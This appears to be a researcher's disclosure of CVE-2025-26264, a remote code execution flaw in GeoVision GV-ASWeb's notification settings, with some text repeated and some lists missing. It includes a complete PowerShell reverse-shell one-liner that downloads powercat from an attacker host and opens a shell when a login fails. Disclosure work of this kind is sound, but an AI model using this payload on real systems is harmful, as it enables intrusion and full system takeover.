
CVE-2025-26264 - GeoVision GV-ASWeb with the version 6.1.2.0 or less, contains a Remote Code Execution (RCE) vulnerability within its Notification Settings feature. An authenticated attacker with "System Settings" privileges in ASWeb can exploit this flaw to execute arbitrary commands on the server, leading to a full system compromise.
CVE-2025-26264 - GeoVision GV-ASWeb with the version 6.1.2.0 or less, contains a Remote Code Execution (RCE) vulnerability within its Notification Settings feature. An authenticated attacker with "System Settings" privileges in ASWeb can exploit this flaw to execute arbitrary commands on the server, leading to a full system compromise.
To perform successful attack an attacker requires:
The vulnerability can be leveraged to perform the following unauthorized actions:
Exploiting Remote Code Execution vulnerability in GeoVision GV-ASManager's ASWeb platform is possible against versions 6.1.2.0 or less (there is no fix as of 26 February 2025).
GeoVision ASManager's ASWeb function Notification Setting is vulnerable to RCE
HTTP request of setting up a notification on a specific event: Failed TAWeb login attempt
According to this script, If there is a failed TAWeb login attempt, the following PowerShell script will be executed:
powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell
A failed attempt of authentication in TAWeb
Victim's host: The script opens a backdoor to the attacker's host.
Attacker's host: An attacker gets the shell
If you have a question, you can contact me, Giorgi Dograshvili on LinkedIn.